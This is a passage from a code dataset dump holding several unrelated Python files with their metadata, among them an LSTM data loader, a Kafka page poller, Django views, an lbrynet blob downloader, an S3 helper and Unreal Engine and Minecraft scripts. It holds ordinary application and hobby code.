self.construct_matrix(self.train_users[self.used_train: self.used_train+batch_size], sequence_len, batch_size)\n output_mask = Y > 0\n self.used_train += batch_size\n return X, Y, output_mask, True\n\n def get_batch_test(self, batch_size, sequence_len):\n \"\"\"return X(batch * seq), Y(batch * movie), output_mask(batch * movie), flag\"\"\"\n if batch_size + self.used_test >= len(self.test_users):\n return None, None, None, False\n X, Y = self.construct_matrix(self.test_users[self.used_test: self.used_test+batch_size], sequence_len, batch_size)\n output_mask = Y > 0\n self.used_test += batch_size\n return X, Y, output_mask, True\n\n def renew_train(self):\n self.used_train = 0\n rd.shuffle(self.train_users)\n\n def renew_test(self):\n self.used_test = 0\n rd.shuffle(self.test_users)\n\n def rating_coding(self, rating_list, seq_len):\n \"\"\"\n The rating_list is already in time order\n return a 1 * seq_len matrix\n \"\"\"\n output = np.ones((1, seq_len)) * (-1)\n if len(rating_list) > seq_len:\n rating_list = rating_list[len(rating_list) - seq_len:]\n\n for i in range(seq_len - len(rating_list), seq_len):\n output[0, i] = self.movie2ratingid(rating_list[i-(seq_len - len(rating_list))][0], rating_list[i- (seq_len - len(rating_list))][1], self.movieDim)\n return output\n\n def movie2ratingid(self, movie_id, rating, number_movie):\n return (rating - 1) * number_movie + self.movieID2index[movie_id]\n\n def left2vector(self, ratings):\n \"\"\"Return a 1 * movie matrix\"\"\"\n output = np.zeros((1, self.movieDim))\n for rating in ratings:\n output[0, self.movieID2index[rating[0]]] = rating[1]\n return output\n\n def construct_matrix(self, users, seq_len, batch_size):\n \"\"\"\n :param users: list of keys in self.userList(Dict), which contains all triples of certain user\n :param seq_len:\n :return: X(batch * seq), Y(batch * movie)\n \"\"\"\n matrix_X = np.zeros((batch_size, seq_len))\n matrix_Y = np.zeros((batch_size, self.movieDim))\n i = 0\n for user in users:\n splitPoint = rd.randint(1, len(self.userList[user]) - 1)\n matrix_X[i] = self.rating_coding(self.userList[user][0: splitPoint-1], seq_len)\n matrix_Y[i] = self.left2vector(self.userList[user][splitPoint-1:])\n i += 1\n\n return matrix_X, matrix_Y\n\n\nif __name__ == '__main__':\n\n myData = Data('../ml-1m/ratings.dat')\n myData.split(0.8)\n X, Y, _, _ = myData.get_batch_train(512, 20)\n myData.shuffle_train()\n myData.renew_train()\n X, Y, _, _ = myData.get_batch_train(512, 20)\n\n\n\n\n\n","sub_path":"old_implement/Data_lstm.py","file_name":"Data_lstm.py","file_ext":"py","file_size_in_byte":4759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"121957513","text":"import logging\nimport time\nfrom datetime import datetime\nfrom json import dumps\nfrom os import environ\nfrom urllib.error import URLError\nfrom urllib.request import urlretrieve\n\nfrom kafka import KafkaProducer\n\nfrom util.page_config import PageConfig\n\nenv_name_bootstrap_server = \"BOOTSTRAP_SERVERS\"\nenv_name_interval = \"RETRIEVE_INTERVAL\"\n\ndefault_retrieve_interval = 60\n\ndef get_page(url):\n \"\"\"\n Retrieve a webpage from a URL and return its contents\n :param url: URL\n :return:\n \"\"\"\n tmp_file, _ = urlretrieve(url)\n with open(tmp_file) as f:\n return f.read()\n\n\ndef get_retrieve_interval() -> int:\n interval = environ.get(env_name_interval)\n retrieve_interval = default_retrieve_interval\n if not interval:\n logging.info(f\"{env_name_interval} not set, using {default_retrieve_interval} seconds\")\n else:\n retrieve_interval = int(interval)\n logging.info(f\"{env_name_interval} set, using {retrieve_interval} seconds\")\n return retrieve_interval\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n boostrap_server = environ.get(env_name_bootstrap_server)\n if not boostrap_server:\n raise EnvironmentError(f\"Set {env_name_bootstrap_server} in environment\")\n\n retrieve_interval = get_retrieve_interval()\n p = PageConfig.from_file(\"page_config.json\")\n logging.info(f\"Getting pages from {p.url} ...\")\n producer = KafkaProducer(bootstrap_servers=boostrap_server)\n # value_serializer=lambda rec: dumps(rec.to_json()).encode('utf-8')\n while True:\n try:\n page_data = get_page(p.url)\n r = producer.send(p.topic, page_data.encode(\"utf-8\"))\n with open(f\"pages/{datetime.now().timestamp()}.html\", 'w') as f:\n f.write(page_data)\n while not r.is_done:\n time.sleep(0.1)\n logging.info(f\"Wrote page with offset {r.value.offset} and timestamp {r.value.timestamp}\")\n except URLError:\n logging.warning(f\"Could not fetch page from URL {p.url} .. retrying in {retrieve_interval} seconds\")\n time.sleep(retrieve_interval)\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"609467362","text":"import sys, os, configparser\nimport tkinter as tk\nimport tkinter.ttk as ttk\nfrom GameHandler import GameHandler\nfrom RegistryHandler import RegistryHandler\n\nclass MainApplication(ttk.Frame):\n\n bfdir = None\n bfapp = '\\\\BF1942.exe'\n ip = None\n\n mod = None\n\n # initializes the app\n def __init__(self, root):\n # handle configuration\n self.bfdir = RegistryHandler.getGameLocation()\n try:\n config = configparser.ConfigParser()\n cf = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'config.ini')\n config.readfp(open(cf))\n self.ip = config.get('config', 'ip')\n self.bfdir = config.get('config', 'bfdir')\n except FileNotFoundError:\n print('Couldn\\'t read config file.', file=sys.stderr)\n except configparser.NoOptionError:\n print('Couldn\\'t read an option.')\n\n # initialize GUI\n ttk.Frame.__init__(self, root)\n root.title('Server Status')\n root.resizable(0,0)\n\n # center the window\n w = root.winfo_screenwidth()\n h = root.winfo_screenheight()\n x = (root.winfo_screenwidth() - root.winfo_reqwidth()) / 2\n y = (root.winfo_screenheight() - root.winfo_reqheight()) / 2\n root.geometry(\"+%d+%d\" % ((x, y)))\n\n self.pack(padx=4, pady=4)\n self.createWidgets()\n self.refreshStatus()\n return\n\n def createWidgets(self):\n # force width of message area due to Tk wierdness\n mw = 240\n if self.bfdir == None:\n mw = 160\n self.status = tk.Message(self, text='Refreshing...', anchor='w', width=mw)\n\n self.join = ttk.Button(self, text=\"Join\", command=self.joinGame)\n self.refresh = ttk.Button(self, text=\"Refresh\", command=self.refreshStatus)\n self.quit = ttk.Button(self, text=\"Quit\", command=root.destroy)\n\n cr = 0\n self.status.grid(row=cr, column=0, columnspan=3, sticky=tk.W, padx=2, pady=2)\n cr += 1\n\n if self.bfdir != None:\n self.join.grid(row=cr, column=0, sticky=tk.E, padx=2, pady=2)\n self.refresh.grid(row=cr, column=1, padx=2, pady=2)\n self.quit.grid(row=cr, column=2, sticky=tk.E, padx=2, pady=2)\n return\n\n def refreshStatus(self):\n status, mod = GameHandler.getStatus(self.ip)\n if status == None:\n status = 'Failed to retrieve status.'\n self.status.config(text=status)\n if mod != None:\n self.mod = mod\n\n def joinGame(self):\n if GameHandler.joinGame(self.ip, self.bfdir, self.bfapp, self.mod) == True:\n root.destroy()\n else:\n error = 'Couldn\\'t launch game.\\nTry setting the game location in config.ini.'\n self.status.config(text=error)\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n MainApplication(root).pack(side=\"top\", fill=\"both\", expand=True)\n root.mainloop()","sub_path":"app.pyw","file_name":"app.pyw","file_ext":"pyw","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"487095007","text":"from django.shortcuts import render,redirect\nfrom django.http import HttpResponse,HttpResponseRedirect,Http404, JsonResponse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import NewProjectForm, NewRatingForm, NewProfileForm\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom .models import Project,Profile,AwardsProfiles,AwardsProjects,Rating\nfrom .serializer import ProfileSerializer,ProjectSerializer\nfrom rest_framework import status\nfrom .permissions import IsAdminOrReadOnly\nimport datetime as dt\nfrom django.contrib.auth.models import User\n\ndef convert_dates(dates):\n # function that gets the weekday number for the date.\n day_number = dt.date.weekday(dates)\n\n days = ['Monday','Tuesday','Wednesday','thursday','Friday','Saturday','Sunday']\n '''\n Returns the actual day of the week\n '''\n day = days[day_number]\n return day\n\n\n@login_required(login_url='/accounts/login/')\ndef index(request):\n id = request.user.id\n projects = Project.objects.all().order_by('-pub_date')\n\n return render(request, 'index.html',{'projects':projects,'profile':profile})\n\n@login_required(login_url='/accounts/login/')\ndef myprojects(request):\n projects = Project.objects.all().order_by()\n return render(request,'myprojects.html', {'projects':projects})\n\n@login_required(login_url='/accounts/login/')\ndef project(request, id):\n ida = request.user.id\n project = Project.objects.get(pk=id)\n ratings = Rating.objects.filter(project=id)\n project = Project.objects.get(pk=id)\n\n return render(request, 'project.html',{'profile':profile,'project':project,'ratings':ratings})\n\n@login_required(login_url='/accounts/login/')\ndef new_projects(request):\n ida = request.user.id\n\n if request.method == 'POST':\n form = NewProjectForm(request.POST, request.FILES)\n if form.is_valid():\n project = form.save(commit=False)\n project.save()\n return redirect('index')\n\n else:\n form = NewProjectForm()\n\n return render(request, 'new_project.html',{'form':form,'profile':profile})\n \n@login_required(login_url='/accounts/login/')\ndef profile(request, id):\n ida = request.user.id\n profile = Profile.objects.get(user=ida)\n user = request.user\n myprofile = Profile.objects.get(pk=id)\n\n return render(request, 'profile.html',{'profile':profile,'projects':projects})\n\n@login_required(login_url='/accounts/login/')\ndef edit_profile(request):\n ida = request.user.id\n profile = Profile.objects.get(user=ida)\n \n if request.method == 'POST':\n instance = get_object_or_404(Profile, user=ida)\n form = NewProfileForm(request.POST, request.FILES,instance=instance)\n if form.is_valid():\n form.save()\n\n return redirect('profile', ida)\n\n else:\n form = NewProfileForm()\n\n return render(request, 'edit_profile.html',{'form':form,'profile':profile})\n\ndef search(request):\n\n if 'project' in request.GET and request.GET[\"project\"]:\n search_term = request.GET.get(\"project\")\n searched_projects = project.search_by_title(search_term)\n message = f\"{search_term}\"\n return render(request, 'search.html',{\"message\":message,\"projects\": searched_projects})\n\n else:\n message = \"You haven't searched for any term\"\n return render(request, 'search.html',{\"message\":message})\n\nclass ProfileList(APIView):\n def get(self, request, format=None):\n all_profile = AwardsProfiles.objects.all()\n serializers = ProfileSerializer(all_profile, many=True)\n return Response(serializers.data)\n\n def post(self, request, format=None):\n serializers = ProfileSerializer(data=request.data)\n if serializers.is_valid():\n serializers.save()\n return Response(serializers.data, status=status.HTTP_201_CREATED)\n return Response(serializers.errors, status=status.HTTP_400_BAD_REQUEST)\n permission_classes = (IsAdminOrReadOnly,)\nclass ProjectList(APIView):\n def get(self, request, format=None):\n all_project = AwardsProjects.objects.all()\n serializers = ProjectSerializer(all_project, many=True)\n return Response(serializers.data)\n\n def post(self, request, format=None):\n serializers = ProjectSerializer(data=request.data)\n if serializers.is_valid():\n serializers.save()\n return Response(serializers.data, status=status.HTTP_201_CREATED)\n return Response(serializers.errors, status=status.HTTP_400_BAD_REQUEST)\n permission_classes = (IsAdminOrReadOnly,)\nclass ProfileDescription(APIView):\n permission_classes = (IsAdminOrReadOnly,)\n def get_profile(self, pk):\n try:\n return ProfileList.objects.get(pk=pk)\n except ProfileList.DoesNotExist:\n return Http404\n\n def get(self, request, pk, format=None):\n merch = self.get_profile(pk)\n serializers = ProfileSerializer(merch)\n return Response(serializers.data)\n\nclass ProjectDescription(APIView):\n permission_classes = (IsAdminOrReadOnly,)\n def get_project(self, pk):\n try:\n return ProjectList.objects.get(pk=pk)\n except ProjectList.DoesNotExist:\n return Http404\n\n def get(self, request, pk, format=None):\n merch = self.get_project(pk)\n serializers = ProjectSerializer(merch)\n return Response(serializers.data)\n@login_required(login_url='/accounts/login/')\ndef newrating(request,id):\n ida = request.user.id\n idd = id\n current_username = request.user.username\n\n if request.method == 'POST':\n form = NewRatingForm(request.POST)\n if form.is_valid():\n rating = form.save(commit=False)\n design_rating = form.cleaned_data['design']\n usability_rating = form.cleaned_data['usability']\n content_rating = form.cleaned_data['content']\n rating.postername = current_username\n rating.project = Project.objects.get(pk=id)\n\n rating.save()\n return redirect('project',id)\n\n else:\n form = NewRatingForm()\n\n return render(request, 'newrating.html',{'form':form,'profile':profile,'idd':idd})","sub_path":"award/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"369471767","text":"#!/usr/bin/env python\n\nimport asyncio, datetime, websockets\nfrom token_manager import TokenManager\n\nmanager = TokenManager()\nasync def time(websocket, path):\n global manager\n while True:\n # now = datetime.datetime.utcnow().isoformat() + 'Z'\n # await websocket.send(json.dumps({\"now\": now}))\n\n request = await websocket.recv()\n broadcast = manager.process_request(request)\n if broadcast:\n message = manager.envelop_message()\n await websocket.send(message)\n\n\nif __name__ == '__main__':\n start_server = websockets.serve(time, '128.163.154.220', 5678)\n\n asyncio.get_event_loop().run_until_complete(start_server)\n asyncio.get_event_loop().run_forever()\n","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"622889382","text":"import tensorflow as tf\nimport numpy as np\nimport pickle\nimport cv2\nimport sys\n\ndiff_model=tf.keras.models.load_model('diff_model.h5')\nencode_model=tf.keras.models.load_model('encode_model.h5')\n\n\ndata=pickle.load(open('one_shot_inputs.pickle','rb'))\ndata=np.asarray(data)\nlabel=np.array(data[:,1])\nimage_path=sys.argv[1]\n\ndef pre(img):\n\tinp=encode_model.predict(np.expand_dims(img,0))\n\tx=np.zeros((200,2048,))\n\ti=0\n\tfor y in data[:,0]:\n\t\tx[i,:]=np.sqrt(np.square(y-inp[0]))\n\t\ti=i+1\n\treturn x\n\ndef prediction(x):\n\ty=diff_model.predict(x)\n\ta=None\n\tn=np.argmax(y)\n\tif y[n]>0.7:\n\t\ta=label[n]\n\treturn a\n\ndef frames(frame):\n\timg=cv2.resize(frame,(299,299))\n\tx=pre(img)\n\ty=prediction(x)\n\timage = cv2.putText(frame, y, (50,50), cv2.FONT_HERSHEY_SIMPLEX, 2, (0,0,255), 2, cv2.LINE_AA)\n\treturn image\n\ncap = cv2.VideoCapture(image_path)\nret=True \nwhile(ret):\n ret, frame = cap.read()\n try:\n \timage = frames(frame)\n except:\n \tprint(\"Failed\")\n cv2.imshow('frame',image)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()","sub_path":"one_shot.py","file_name":"one_shot.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"312484134","text":"import asyncio\nimport typing\nimport logging\nfrom lbrynet import conf\nfrom lbrynet.utils import drain_tasks\nfrom lbrynet.blob_exchange.client import BlobExchangeClientProtocol, request_blob\nif typing.TYPE_CHECKING:\n from lbrynet.dht.node import Node\n from lbrynet.dht.peer import KademliaPeer\n from lbrynet.blob.blob_manager import BlobFileManager\n from lbrynet.blob.blob_file import BlobFile\n\nlog = logging.getLogger(__name__)\n\n\ndef drain_into(a: list, b: list):\n while a:\n b.append(a.pop())\n\n\nclass BlobDownloader: # TODO: refactor to be the base class used by StreamDownloader\n \"\"\"A single blob downloader\"\"\"\n def __init__(self, loop: asyncio.BaseEventLoop, blob_manager: 'BlobFileManager', config: conf.Config):\n self.loop = loop\n self.blob_manager = blob_manager\n self.new_peer_event = asyncio.Event(loop=self.loop)\n self.active_connections: typing.Dict['KademliaPeer', BlobExchangeClientProtocol] = {}\n self.running_download_requests: typing.List[asyncio.Task] = []\n self.requested_from: typing.Dict[str, typing.Dict['KademliaPeer', asyncio.Task]] = {}\n self.lock = asyncio.Lock(loop=self.loop)\n self.blob: 'BlobFile' = None\n self.blob_queue = asyncio.Queue(loop=self.loop)\n\n self.blob_download_timeout = config.blob_download_timeout\n self.peer_connect_timeout = config.peer_connect_timeout\n self.max_connections = config.max_connections_per_download\n\n async def _request_blob(self, peer: 'KademliaPeer'):\n if self.blob.get_is_verified():\n log.info(\"already verified\")\n return\n if peer not in self.active_connections:\n log.warning(\"not active, adding: %s\", str(peer))\n self.active_connections[peer] = BlobExchangeClientProtocol(self.loop, self.blob_download_timeout)\n protocol = self.active_connections[peer]\n success, keep_connection = await request_blob(self.loop, self.blob, protocol, peer.address, peer.tcp_port,\n self.peer_connect_timeout)\n await protocol.close()\n if not keep_connection:\n log.info(\"drop peer %s:%i\", peer.address, peer.tcp_port)\n if peer in self.active_connections:\n async with self.lock:\n del self.active_connections[peer]\n return\n log.info(\"keep peer %s:%i\", peer.address, peer.tcp_port)\n\n def _update_requests(self):\n self.new_peer_event.clear()\n if self.blob.blob_hash not in self.requested_from:\n self.requested_from[self.blob.blob_hash] = {}\n to_add = []\n for peer in self.active_connections.keys():\n if peer not in self.requested_from[self.blob.blob_hash] and peer not in to_add:\n to_add.append(peer)\n if to_add or self.running_download_requests:\n log.info(\"adding download probes for %i peers to %i already active\",\n min(len(to_add), 8 - len(self.running_download_requests)),\n len(self.running_download_requests))\n else:\n log.info(\"downloader idle...\")\n for peer in to_add:\n if len(self.running_download_requests) >= 8:\n break\n task = self.loop.create_task(self._request_blob(peer))\n self.requested_from[self.blob.blob_hash][peer] = task\n self.running_download_requests.append(task)\n\n def _add_peer_protocols(self, peers: typing.List['KademliaPeer']):\n added = 0\n for peer in peers:\n if peer not in self.active_connections:\n self.active_connections[peer] = BlobExchangeClientProtocol(self.loop, self.blob_download_timeout)\n added += 1\n if added:\n if not self.new_peer_event.is_set():\n log.info(\"added %i new peers\", len(peers))\n self.new_peer_event.set()\n\n async def _accumulate_connections(self, node: 'Node'):\n try:\n async with node.stream_peer_search_junction(self.blob_queue) as search_junction:\n async for peers in search_junction:\n if not isinstance(peers, list): # TODO: what's up with this?\n log.error(\"not a list: %s %s\", peers, str(type(peers)))\n else:\n self._add_peer_protocols(peers)\n return\n except asyncio.CancelledError:\n pass\n\n async def get_blob(self, blob_hash: str, node: 'Node') -> 'BlobFile':\n self.blob = self.blob_manager.get_blob(blob_hash)\n if self.blob.get_is_verified():\n return self.blob\n accumulator = self.loop.create_task(self._accumulate_connections(node))\n self.blob_queue.put_nowait(blob_hash)\n try:\n while not self.blob.get_is_verified():\n if len(self.running_download_requests) < self.max_connections:\n self._update_requests()\n\n # drain the tasks into a temporary list\n download_tasks = []\n drain_into(self.running_download_requests, download_tasks)\n got_new_peer = self.loop.create_task(self.new_peer_event.wait())\n\n # wait for a new peer to be added or for a download attempt to finish\n await asyncio.wait([got_new_peer] + download_tasks, return_when='FIRST_COMPLETED',\n loop=self.loop)\n if got_new_peer and not got_new_peer.done():\n got_new_peer.cancel()\n if self.blob.get_is_verified():\n if got_new_peer and not got_new_peer.done():\n got_new_peer.cancel()\n drain_tasks(download_tasks)\n return self.blob\n except asyncio.CancelledError:\n drain_tasks(self.running_download_requests)\n raise\n finally:\n if accumulator and not accumulator.done():\n accumulator.cancel()\n","sub_path":"lbrynet/blob_exchange/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":6043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"378912350","text":"import boto3\nimport botocore\nimport os\n\n\n\ns3conn = None\ndataprovider_bucket = None\n\ndef set_conn():\n global s3conn\n s3conn = make_s3_resource()\n\n\ndef make_s3_resource():\n s3 = boto3.resource('s3',\n aws_access_key_id=os.getenv('S3_BLOG_UPLOAD_ACCESS_KEY'),\n aws_secret_access_key=os.getenv('S3_BLOG_UPLOAD_SECRET'),\n region_name=os.getenv('AWS_S3_REGION'))\n return s3\n\n\ndef write_s3_file(bucket_name, s3_filename, content):\n assert isinstance(content, basestring)\n try:\n s3conn.Object(bucket_name, s3_filename).put(\n Body=content)\n return True\n except botocore.exceptions.ClientError as e:\n return False\n\n\ndef read_s3_file(bucket_name, s3_filename):\n try:\n return s3conn.Object(bucket_name, s3_filename).get()[\"Body\"].read()\n except botocore.exceptions.ClientError as e:\n return\n\n","sub_path":"s3util.py","file_name":"s3util.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"133986225","text":"import unreal_engine as ue\nfrom unreal_engine import FVector, FRotator\nfrom unreal_engine.classes import Character, PawnSensingComponent, Pawn, TriggerBox, Actor\n\nue.log('Hello, I am a Python module')\n\n\nclass Hero:\n def begin_play(self):\n obj = self.uobject\n ue.log(\"Hero:begin_play\")\n\n prop_list = self.uobject.properties()\n for prop in prop_list:\n prop_value = obj.get_property(prop)\n ue.log('property ' + prop + ': ' + str(prop_value))\n\n world = self.uobject.get_world()\n ue.log('world ' + str(world))\n\n full_name = self.uobject.get_full_name()\n ue.log('Hero full name ' + full_name)\n\n # all_objects = self.uobject.all_objects()\n # ue.log('all objects:')\n # for obj in all_objects:\n # print(obj.get_name())\n\n # sphere_actor = self.uobject.find_object('Sphere')\n # ue.log('sphere actor ' + cube_actor)\n\n # all_actors = self.uobject.all_actors()\n # for actor in all_actors:\n # print(actor.get_name())\n\n hero_class = self.uobject.get_class()\n ue.log('Hero class ' + str(hero_class))\n\n mesh_actor = self.uobject.actor_spawn(ue.find_class('StaticMeshActor'), self.uobject.get_actor_location() + FVector(0, 0, 200), self.uobject.get_actor_rotation())\n ue.log('mesh actor ' + mesh_actor.get_name())\n mesh_comp = mesh_actor.StaticMeshComponent\n mesh_comp.call('SetStaticMesh /Engine/EngineMeshes/Sphere.Sphere')\n self.mesh_actor = mesh_actor\n self.elapsed_time = 0\n\n # static_mesh_comp_class = ue.find_class('StaticMeshComponent')\n # has_mesh_comp = self.uobject.actor_has_component_of_type(ue.find_class('StaticMeshComponent'))\n # ue.log('has mesh comp: ' + str(has_mesh_comp))\n\n # static_mesh_comp = obj.get_actor_component_by_type(static_mesh_comp_class)\n # static_mesh_comp = obj.get_component_by_type(static_mesh_comp_class)\n # ue.log('static mesh comp: ' + str(static_mesh_comp))\n #\n # all_comps = obj.get_actor_components()\n # ue.log('all components')\n # for comp in all_comps:\n # ue.log(str(comp))\n\n obj.bind_key('K', ue.IE_PRESSED, self.k_pressed)\n obj.bind_key('Q', ue.IE_PRESSED, self.q_pressed)\n # self.uobject.bind_axis('MoveForward', self.move_forward)\n obj.enable_input()\n # obj.show_mouse_cursor()\n # obj.enable_click_events()\n # obj.enable_mouse_over_events()\n\n if obj.actor_has_tag('Test'):\n ue.log('Hero has tag Test')\n\n location, extents = obj.get_actor_bounds()\n ue.log('Hero location: ' + str(location) + ' extents: ' + str(extents))\n\n # hit = obj.line_trace_single_by_channel(location + FVector(0, 500, 0), location + FVector(0, -500, 0), 0)\n # ue.log('hit: ' + str(hit))\n\n hits = obj.line_trace_multi_by_channel(location + FVector(0, 500, 0), location + FVector(0, -500, 0), 0)\n for hit in hits:\n ue.log('hit: ' + str(hit))\n\n static_mesh_comp_class = ue.find_class('StaticMeshComponent')\n static_mesh_comp = obj.add_actor_component(static_mesh_comp_class, 'MeshComp')\n ue.log('static mesh comp: ' + str(static_mesh_comp))\n\n root_mesh_comp = obj.add_actor_root_component(static_mesh_comp_class, 'RootMeshComp')\n ue.log('root mesh comp: ' + str(root_mesh_comp))\n\n def tick(self, delta_time):\n obj = self.uobject\n location = self.uobject.get_actor_location()\n location.z += 100 * delta_time\n self.uobject.set_actor_location(location)\n # self.uobject.set_actor_location(100, 100, 100)\n # ue.log('Hero location ' + location)\n\n self.uobject.set_actor_rotation(0, 90, 0)\n rotation = self.uobject.get_actor_rotation()\n # ue.log('Hero rotation ' + rotation)\n\n forward = self.uobject.get_actor_forward()\n # ue.log('Hero forward ' + forward)\n\n right = self.uobject.get_actor_right()\n # ue.log('Hero right ' + right)\n\n up = self.uobject.get_actor_up()\n # ue.log('Hero up ' + up)\n\n velocity = self.uobject.get_actor_velocity()\n # ue.log('Hero velocity ' + velocity)\n\n prop_role = self.uobject.get_property('Role')\n # ue.log('Hero Role ' + str(prop_role))\n\n if obj.is_input_key_down('O'):\n ue.log('O pressed')\n mouse_hit = obj.get_hit_result_under_cursor(0)\n ue.log('mouse hit: ' + str(mouse_hit))\n #\n # forward_value = obj.get_input_axis('MoveForward')\n # if forward_value > 0:\n # ue.log('forward value: ' + str(forward_value))\n\n def k_pressed(self):\n self.mesh_actor.actor_destroy()\n\n def q_pressed(self):\n self.uobject.quit_game()\n\n def move_forward(self, amount):\n location = self.uobject.get_actor_location()\n location.x += 100 * amount\n self.uobject.set_actor_location(location)\n\n\nclass Ball:\n def begin_play(self):\n self.uobject.bind_event('OnActorBeginOverlap', self.manage_overlap)\n self.uobject.bind_action('Jump', ue.IE_PRESSED, self.uobject.jump)\n self.uobject.bink_key('K', ue.IE_PRESSED, self.you_pressed_K)\n self.uobject.bind_axis('MoveForward', self.move_forward)\n\n def manage_overlap(self, me, other):\n ue.print_string('overlapping ' + other.get_name())\n\n def you_pressed_K(self):\n ue.log_warning('you pressed K')\n\n def move_forward(self, amount):\n ur.print_string(\"axis value: \" + str(amount))\n\n\nclass DestroyWhenOverlap:\n def begin_play(self):\n ue.print_string('Hello')\n\n def on_actor_begin_overlap(self, me, other_actor):\n ue.print_string('Collided with ' + other_actor.get_name())\n self.uobject.actor_destroy()\n\n\nclass CreatePyActor:\n def begin_play(self):\n new_actor = self.uobject.actor_spawn(ue.find_class('PyActor'), FVector(0, 0, 0), FRotator(0, 0, 90))\n static_mesh = new_actor.add_actor_root_component(ue.find_class('StaticMeshComponent'), 'SphereMesh')\n static_mesh.call('SetStaticMesh /Engine/EngineMeshes/Sphere.Sphere')\n new_actor.set_property('PythonModule', 'gameclasses')\n new_actor.set_property('PythonClass', 'Vertical')\n\n # monster = self.uobject.actor_spawn(Monster, self.uobject.get_actor_location(), self.uobject.get_actor_rotation())\n # ue.log('monster name ' + monster.get_name())\n\n\nclass Player:\n def begin_play(self):\n self.pawn = self.uobject.get_owner()\n\n self.base_turn_rate = 45.0\n self.base_look_up_rate = 45.0\n\n self.pawn.bind_axis('TurnRate', self.turn)\n self.pawn.bind_axis('LookUpRate', self.look_up)\n self.pawn.bind_axis('Turn', self.pawn.add_controller_yaw_input)\n self.pawn.bind_axis('LookUp', self.pawn.add_controller_pitch_input)\n\n self.pawn.bind_axis('MoveForward', self.move_forward)\n self.pawn.bind_axis('MoveRight', self.move_right)\n\n self.pawn.bind_action('Jump', ue.IE_PRESSED, self.pawn.jump)\n self.pawn.bind_action('Jump', ue.IE_PRESSED, self.pawn.stop_jumping)\n\n def turn(self, axis_value):\n turn_rate = axis_value * self.base_turn_rate * self.uobject.get_world_delta_seconds()\n self.pawn.add_controller_yaw_input(turn_rate)\n\n def look_up(self, axis_value):\n look_up_rate = axis_value * self.base_look_up_rate * self.uobject.get_world_delta_seconds()\n self.pawn.add_controller_pitch_input(look_up_rate)\n\n def move_forward(self, axis_value):\n rot = self.pawn.get_control_rotation()\n fwd = ue.get_forward_vector(0, 0, rot[2])\n self.pawn.add_movement_input(fwd, axis_value)\n\n def move_right(self, axis_value):\n rot = self.pawn.get_control_rotation()\n right = ue.get_right_vector(0, 0, rot[2])\n self.pawn.add_movement_input(right, axis_value)\n\n\nclass Monster(Character):\n # def __init__(self):\n # self.sensor = self.add_actor_component(PawnSensingComponent, 'Sensor')\n\n def begin_play(self):\n ue.log(\"Monster:begin_play\")\n\n def tick(self, delta_time):\n location = self.uobject.get_actor_location()\n location.z += 100 * delta_time\n self.uobject.set_actor_location(location)\n ue.log('Monster location' + location)\n\n def ReceiveBeginPlay(self):\n self.sensor.SightRadius = 200\n\n def OnSeePawn(self, pawn: Pawn):\n ue.print_string('seen {}'.format(pawn))\n\n\nclass ExplodeTrigger(TriggerBox):\n def ReceiveActorBeginOverlap(self, other: Actor):\n ue.log(\"Triggered by\" + str(other))\n","sub_path":"AndroidProject/Content/Scripts/PythonTest.py","file_name":"PythonTest.py","file_ext":"py","file_size_in_byte":8621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"351558158","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 25 14:32:04 2021\n\n@author: USER\n\"\"\"\nfrom mcpi.minecraft import Minecraft as mc\nimport time\nmcs=mc.create()\nx,y,z=mcs.player.getTilePos()\ni =0\nwhile i < 5:\n mcs.player.setTilePos(x,y,z)\n time.sleep(2.5)\n y=y-10\n i=i+1","sub_path":"day1/class1_6py-day11.py","file_name":"class1_6py-day11.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"492102822","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jul 5 20:40:34 2018\r\n\r\n@author: User\r\n\"\"\"\r\n\r\nimport xlrd\r\nfrom sklearn import linear_model\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nworkbook = xlrd.open_workbook('Income Statement.xls')\r\nbooksheet = workbook.sheet_by_index(1)\r\ncompany = booksheet.col_values(1)\r\ncompany1 = []\r\nfor i in company[1:]:\r\n if i not in company1:\r\n company1.append(i)\r\nendtime = booksheet.col_values(4) \r\n\r\nendtime2 = ['2018-03-31','2017-12-31','2017-09-30','2017-06-30','2017-03-31','2016-12-31','2016-09-30','2016-06-30','2016-03-31','2015-12-31','2015-09-30','2015-06-30','2015-03-31','2014-12-31','2014-09-30','2014-06-30','2014-03-31','2013-12-31','2013-09-30','2013-06-30','2013-03-31']\r\ndf_revenue = pd.DataFrame(np.arange(126).reshape((6,21)),index=company1, columns=endtime2)\r\nall_row = []\r\nfor r in range(len(company)):\r\n all_row.append(booksheet.row_values(r))\r\nfor i in range(len(all_row)):\r\n for j in endtime2:\r\n for k in company1:\r\n if all_row[i][1] == k and all_row[i][4] == 